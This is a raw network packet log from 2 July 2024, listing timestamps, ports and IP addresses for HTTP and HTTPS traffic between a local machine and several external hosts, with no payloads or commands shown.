Jul 2, 2024 00:05:08.654205084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654217005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654222012 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654228926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654238939 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654254913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654264927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654275894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654283047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654287100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654290915 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654292107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654300928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654311895 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654320955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654321909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654331923 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654342890 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654352903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654357910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654364109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654376030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654386044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654387951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654387951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654397011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654422045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654441118 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654475927 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.654961109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654973030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654982090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.654993057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.655003071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.655013084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.655030012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.655038118 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.655046940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.655056953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655056953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.655056953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.655069113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655080080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655088902 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655100107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655107021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655107975 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.655109882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655121088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655131102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655141115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655145884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655145884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655150890 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655160904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655172110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655174017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655181885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655190945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655191898 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655201912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655211926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655221939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655230999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655235052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655235052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655241966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655252934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655256033 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655287981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655287981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655586004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655596972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655606031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655616045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655626059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655632973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655636072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655646086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655652046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655656099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655663013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655667067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655694962 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655697107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655708075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655714989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655718088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655729055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655742884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655749083 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655754089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655764103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655775070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655776978 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655785084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655795097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655805111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655806065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655806065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655817986 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655827999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655833006 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655838966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655849934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655855894 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655858994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.655874968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655893087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.655934095 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656111002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656121969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656131983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656141996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656151056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656162977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656164885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656172991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656178951 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656183004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656193018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656203032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656212091 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656212091 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656213045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656223059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656232119 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656239033 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656250954 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656261921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656267881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656270981 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656280041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656280994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656291962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656331062 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656331062 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656332970 CEST	80	49715	80.78.242.100	192.168.2.6
Jul 2, 2024 00:05:08.656343937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656353951 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656363964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656374931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656384945 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656394958 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656404018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656410933 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656414032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656423092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656431913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656444073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656452894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656457901 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656457901 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656462908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656472921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656488895 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656493902 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656507969 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656517982 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656548977 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656716108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656727076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656738043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656748056 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656757116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656766891 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656776905 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656784058 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656800032 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656827927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656847000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656857967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656866074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656877041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656887054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656892061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656898022 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656909943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656919956 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656929970 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656932116 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656939030 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656950951 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656966925 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656968117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656968117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.656977892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656987906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.656996965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657001019 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657006979 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657020092 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657042980 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657135963 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657146931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657155991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657166004 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657176971 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657186031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657196045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657196045 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657202959 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657207012 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657217026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657227039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657237053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657243013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657246113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657252073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.657253027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657304049 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657304049 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.657491922 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.657548904 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.657613039 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.657749891 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.657758951 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.657829046 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.657836914 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.657881021 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.657887936 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658041954 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658049107 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658077955 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658118010 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658128977 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658206940 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658366919 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658373117 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658395052 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658453941 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658493996 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658545017 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.658602953 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.658657074 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.667490005 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.667726040 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.667789936 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.667802095 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.668574095 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.668627977 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.668636084 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.668685913 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.668693066 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.669152021 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.669315100 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.669322968 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.669511080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669568062 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.669591904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669598103 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.669629097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669641018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669648886 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.669651985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669663906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669681072 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.669701099 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669718981 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669724941 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.669820070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669831991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669842005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669852018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669862986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669872046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669883966 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669893980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669898033 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669907093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669931889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669975042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669986963 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.669995070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.669997931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670042038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670042038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670080900 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670094013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670104980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670115948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670126915 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670136929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670146942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670157909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670165062 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670165062 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670169115 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670186043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670198917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670216084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670314074 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670330048 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670342922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670423985 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670444012 CEST	49737	443	192.168.2.6	3.5.20.219
Jul 2, 2024 00:05:08.670474052 CEST	443	49737	3.5.20.219	192.168.2.6
Jul 2, 2024 00:05:08.670479059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670490980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670500994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670511961 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670521975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670532942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670542955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670545101 CEST	49737	443	192.168.2.6	3.5.20.219
Jul 2, 2024 00:05:08.670553923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670564890 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670568943 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670568943 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670574903 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670588970 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670591116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670603037 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670612097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670622110 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670633078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670639038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670639038 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670644045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670654058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670664072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670674086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670674086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670675039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670686007 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670696020 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670703888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670705080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670716047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670723915 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670728922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.670737982 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.670767069 CEST	49714	80	192.168.2.6	77.105.133.27
